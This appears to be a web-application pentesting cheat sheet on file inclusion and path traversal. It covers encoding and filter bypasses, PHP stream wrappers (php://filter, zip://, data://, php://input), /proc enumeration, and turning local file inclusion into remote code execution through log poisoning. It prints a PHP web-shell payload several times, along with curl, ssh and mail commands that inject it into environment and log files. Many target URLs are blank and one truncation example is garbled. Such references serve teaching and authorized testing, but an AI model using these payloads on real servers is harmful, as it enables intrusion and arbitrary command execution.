File Inclusion and Path Traversal - Web Applications Pentesting

File Inclusion and Path Traversal

At a Glance

File Inclusion

File inclusion is the method for applications, and scripts, to include local or remote files during run-time. The vulnerability occurs when an application generates a path to executable code using an attacker-controlled variable, giving the attacker control over which file is executed.

There are two different types. Local File Inclusion (LFI) where the application includes files on the current server. And Remote File Inclusion (RFI) where the application downloads and execute files from a remote server. 1

Path Traversal

A path, or directory, traversal attack consists of exploiting weak validation, or sanitization, of user-supplied data allowing the attacker to read files, or directories, outside the context of the current application.

The use of these techniques may lead to information disclosure, cross-site-Scripting (XSS), and remote code execution (RCE).2


Basic LFI

Absolute Path Traversal

Relative Path Traversal

Null Byte

Sometimes applications append extra characters, like file extensions, to the input variable. A null byte will make the application ignore the following characters.

Note: PHP fixed the issue in version 5.3.4.

Dot Truncation

In PHP, filenames longer than 4096 bytes will be truncated and, characters after that, ignored.[ADD MORE]\.\.\.\.\.\.\.\.[ADD MORE][ADD MORE][ADD MORE]../../../../../etc/passwd

Note: In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/


Manipulating variables that reference files with “dot-dot-slash” (../) sequences and its variations, or using absolute file paths, may allow bypassing poorly implemented input filtering. 3

URLDouble URLUTF-8 Unicode16 bits Unicode
.%2e%252e%c0%2e %e0%40%ae %c0%ae%u002e
/%2f%252f%c0%2f %e0%80%af %c0%af%u2215
\ | %2c | %252c | %c0%5c %c0%80%5c | %u2216 |

Encoded ../


Encoded ..\


Double URL Encoding

UTF-8 Encoding

Bypass Filtering

Bypass ../ removal


Bypass ../ replaced with ;


Windows UNC Share 4

Windows UNC shares can be injected to redirect access to other resources.



Most filter bypassing techniques for LFI can be used for RFI.

Basic RFI

Null Byte

Bypass http(s):// removal


Bypass allow_url_include

On Windows, it is possible to bypass disabled allow_url_include and allow_url_fopen by using SMB. Simply including a script located in an open share.\\\share\shell.php

PHP Stream Wrappers

PHP provides many built-in wrappers for various protocols, to use with file functions such as fopen, copy, file_exists, and filezise. 5


php://filter is a kind of meta-wrapper that allows filtering a stream before the content is read. The resulting data is the encoded version of the given file’s source code.

Note: Multiple filter chains can be specified on one path, chained using | or /.

Filter string.rot13.

Filter convert.base64.

Filter chaining zlib.deflate and convert.base64.
Base64 decode and gzip inflate.

The resulting encoded string can be decoded and inflated by piping it into the following PHP script:

echo [BASE64-STR] | php -r 'echo gzinflate(base64_decode(file_get_contents("php://stdin")));'


zip:// is a wrapper for zip compression streams. To leverage the zip functionalities, upload a zipped PHP script to the server (with the preferred extension) and decompress in the server using the zip://<zipfile>#<file>, being <file> the resulting decompressed file.

echo -n '<?php system($_GET['c']); ?>' > shell.php
zip shell.jpg shell.php


data:// is a wrapper for RFC2397, or data:// scheme. The scheme allows the inclusion of small data items as if it had been included externally. 6

PHP Shell Script.

echo -n '<?php system($_GET['c']); ?>' | base64


expect:// wrapper provide access to processes’ stdio, stdout and stderr via PTY.


php://input is a read-only stream that allows to read raw data from the request body.

curl -X POST --data "<?php echo shell_exec('ls'); ?>" "" -v

The proc File System

The proc file system (procfs) contains a hierarchy of special files that represent the current state of the kernel. It acts as an interface to internal data structures in the kernel for applications and users.

Because of its abstract properties, it is also referred to as a virtual file system.

File within this directory are listed as zero bytes in size, even though, can contain a large amount of data. 7

Process Directories

The /proc directory contains one subdirectory for each process running on the system, which is named after the process ID (PID). Concurrently, each of these directories contains files to store information about the respective process. 8

/proc/self (/fs/proc/self.c)

The /proc/self represents the currently scheduled PID. In other words, a symbolic link to the currently running process’s directory.

It is a self-referenced device driver, or module, maintained by the Kernel.

Useful /proc entries

  • /proc/version: Kernel version.
  • /proc/sched_debug: Scheduling information and running processes per CPU.
  • /proc/mounts: Mounted file systems.
  • /proc/net/arp: ARP table.
  • /proc/net/route: Routing table.
  • proc/net/tcp / udp: TCP or UDP active connections.
  • /proc/net/fib_trie: Routing tables trie.9

Useful /proc/[PID] entries

  • /proc/[PID]/cmdline Process invocation command with parameters.

    It potentially exposes paths, usernames and passwords.

  • /proc/[PID]/environ Environment variables.

    It potentially exposes paths, usernames and passwords.

  • /proc/[PID]/cwd Process’ current working directory.

  • /proc/[PID]/fd/[#] File descriptors.

    Contains one entry for each file which the process has open.

LFI2RCE - /proc


/proc/self/environ contains user inputs that turn it in a useful volatile storage. Apache stores an environment variable for the HTTP_USER_AGENT header to be used by the self-contained modules.10

curl "" -H "User-Agent" --data "<?php system($_GET['c']); ?>"

/proc/[PID]/fd/[FD] 3

  1. Upload A LOT of shells.

  2. Include$PID/fd/$fd.

    Bruteforce the process ID ($PID) and file descriptor id ($FD)

LFI2RCE - Log Poisoning

A log file is a file that contains a record of events from an application. A log poisoning attack consists of triggering one of these events with executable code as part of the logged data, and successively, through LFI, include and execute the code.


It is recommended to first load the target log, not only to verify the access but to identify what data is being stored.

Administrators can modify the logged data according to their needs.


By default, Apache maintains access and error logs. The error log, commonly, register the Referer header, while the acccess log, the User-Agent. 11

Access Log

Make a valid request with the code in the User-Agent header.

curl -H 'User-Agent' --data "<?php system($_GET['c']); ?>" "" -v

Error Log

Make an invalid request, an invalid inclusion for example, with the suitable Referer header.

curl -H 'Referer' --data "<?php system($_GET['c']); ?>" "" -v


The Apache logging API escapes strings going to the logs.

Use single quotes (') since double quotes (") are replaced escaped as "quote";


Common Apache Log Paths

Log files can also be set to custom locations, either globally, or domain based if virtual hosting is enabled.








SSH logs the username of each connection. Create a connection to SSH with the suitable username.

ssh '<?php system('id'); ?>'


Common SSH Log Paths



Email an internal account, containing the script.

mail -s "<?php system($_GET['c']);?>" www-data@ < /dev/null


Further Reading

  1. Contributors to Wikimedia projects. “File Inclusion Vulnerability - Wikipedia.” Wikipedia, the Free Encyclopedia, Wikimedia Foundation, Inc., 24 Nov. 2006, ↩︎

  2. “Path Traversal - OWASP.” OWASP, ↩︎

  3. swisskyrepo. “PayloadsAllTheThings / Directory Traversal.” GitHub, ↩︎

  4. “CWE-40: Path Traversal: ‘\UNC\share\name\’ (Windows UNC Share) (4.1).” CWE -  Common Weakness Enumeration, ↩︎

  5. “PHP: Supported Protocols and Wrappers - Manual.” PHP: Hypertext Preprocessor, ↩︎

  6. “RFC 2397 - The ‘Data’ URL Scheme.” IETF Tools, ↩︎

  7. “The /Proc Filesystem.” The Linux Kernel  Documentation, ↩︎

  8. “Proc(5) - Linux Manual Page.” Michael Kerrisk - Man7.Org, ↩︎

  9. Bernat, Vincent. “IPv4 Route Lookup on Linux ⁕ Vincent Bernat.” MTU Ninja Vincent Bernat, ↩︎

  10. “LFI2RCE (Local File Inclusion to Remote Code Execution) Advanced Exploitation: /Proc Shortcuts.” Ush.It - a Beautiful Place, ↩︎

  11. “Log Files - Apache HTTP Server Version 2.4.” Welcome! - The Apache HTTP Server Project, ↩︎